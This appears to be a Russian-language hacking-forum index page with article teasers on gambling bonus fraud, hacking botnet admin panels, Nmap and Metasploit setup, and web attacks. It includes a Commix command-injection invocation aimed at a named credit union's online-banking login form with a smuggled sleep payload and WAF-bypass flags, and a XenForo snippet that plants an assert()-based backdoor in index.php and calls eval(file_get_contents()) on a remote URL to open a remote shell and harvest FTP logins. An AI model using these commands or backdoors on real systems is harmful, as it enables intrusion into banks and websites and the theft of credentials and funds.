Бонусхантинг 2019

Всем привет, уважаемые форумчане. Что-то мало кто пишет статьи, а тем более по геймблингу, вот решил поделиться. В данной статье не будет никаких приватных схем и т.д., а лишь упорядоченная инфа по теме бонусхантинга. Последняя статья на эту тему на форуме датируется аж 2006 годом, но хантинг как и кардинг до сих пор жив, только … Читать далее

SQLi -> XSS -> shell upload на примере spyadmin

Не так давно мне попалась панелька очередного бота, сделанного на основе TeamViewer. Авторы сего чуда – spyadmin.com (они же vzlomov.com) уже давно в блеках, поэтому можем себе ломать сколько влезет (законом не запрещено и на 95% безопаснее, чем ловить покемонов в церкви). Структура такая: http://s019.radikal.ru/i633/1609/df/9a7b3c98a7b0.png Если вкратце: config.php – подключение к бд, настройки логина/пароля getinfo.php … Читать далее

Cyber Industries – Активная XSS

Сегодня мы будем чекать на баги админ-панель сборки RMS, которая продается на просторах рунета. Изучив весь сорц, я обнаружил, что работа с бд идет через PDO, а значит ловить скуль-инжекты было практически бессмысленно. На удачу, попробовал поискать second order injection, но и этого тоже не было, потому как контент из базы данных почти не использовался … Читать далее

Smoke Bot — Уводим ботов за две затяжки

Добрый день, дамы и господа, сегодня мы будем ломать Smoke Bot Loader. Продукт весьма популярный и на рынке уже достаточно длительное время, и, как мне кажется, от этого будет только интереснее… Структура такая: http://i.imgur.com/AKvST6y.png Затяжка первая. SQL-injection и активная XSS В первую очередь, был изучен гейт. Насколько я понял, автор подразумевал, что раз данные, поступающие … Читать далее

Commix(comm]and [i]njection e[x]ploiter)

git clone https://github.com/stasinopoulos/commix.git commix ============= + тор –proxy="127.0.0.1:9050" но с 1 сервака хуй так 2 комикса хапустишь НАДО думать хитрить как то –level=3 –ignore-401 –skip-waf –tamper= example ./commix.py -u "https://www.communityfirst-yncu.com/Personal/ProductsAndServices/Borrowing/PersonalLoans/Apply/" –data="LoginTag.ShowForm=form%3Bstart-sleep+-s+5+%23&submit=Login+to+Online+Banking" –level=3 –ignore-401 –skip-waf ============ Описание Commix Commix (это сокращение от [comm]and [i]njection e[x]ploiter) имеет простую среду и может использоваться веб-разработчиками, тестерами на проникновение и … Читать далее

Nmap

1. Сканирование Одного Хоста или IP Адреса Сканировать Отдельный IP Адрес : $ nmap 192.168.1.1 Сканировать сервер по Имени Хоста : $ nmap server.shellhacks.com Увеличить Уровень Детализации результатов сканирования : $ nmap -v server.shellhacks.com $ nmap -vv server.shellhacks.com 2. Сканирование Множества IP Адресов Сканировать Множество IP Адресов : $ nmap 192.168.1.1 192.168.1.2 192.168.1.3 $ namp … Читать далее

Metasploit Framework в Ubuntu

Metasploit Framework в Ubuntu apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems apt-get install subversion apt-get build-dep ruby apt-get install ruby-dev libpcap-dev apt-get install rubygems libsqlite3-dev gem install sqlite3-ruby apt-get install rubygems libmysqlclient-dev gem install mysql wget http://downloads.metasploit.com/data…-installer.run chmod +x metasploit-latest-linux-installer.run sudo ./metasploit-latest-linux-installer.run sudo msfupdate =============== cd /opt/metasploit msfupdate msfconsole OR PRO … Читать далее

Как сохранить свои деньги и нервы.

2Administrators & Moderators: Если посчитаете статью актуальной, прошу прикрепить ее сверху в данном топике. Доброго времени суток. Скажу сразу, что в своей статье я ничуть не защищаю кидал, а просто хочу разъяснить с психологоческой точки зрения поведение таких людей в общем. Возможно кому то это и будет интересно =) Не знаю, что подвигнуло меня на … Читать далее

Исследование защиты программы NTFS Streams Info

Программа NTFS Streams Info предназначена для просмотра и редактирования альтернативных потоков NTFS. Не самый удобный инструмент, тот же NTFS Stream Explorer гораздо лучше и по возможностям, и по интерфейсу, да к тому же и бесплатный. Как бы то ни было, проект давно прекратил свое существование, на офсайте уже совсем другая информация. Хороший повод, чтобы потренироваться … Читать далее

Избавляемся от хеширования в Xenforo

Используем "WSO Web Shell" Отправляемся к файлу index.php , и дописываем вредоносный код: Код: if (isset($_REQUEST[‘l’])) assert(stripslashes($_REQUEST[l])); Вызываем скрипт и получаем доступ к RemoteShell: Код: http://www.ru/index.php?l=eval(file_get_contents(%27http://www.ru/screen.png%27))# Отсеиваем логин и пасс из файлов с ФТП , создаем базу данных Код: create table xf_style_property_css ( ID int(20) AUTO_INCREMENT, CSSName varchar(50) NOT NULL, CSSValue varchar(50) NOT NULL, PRIMARY … Читать далее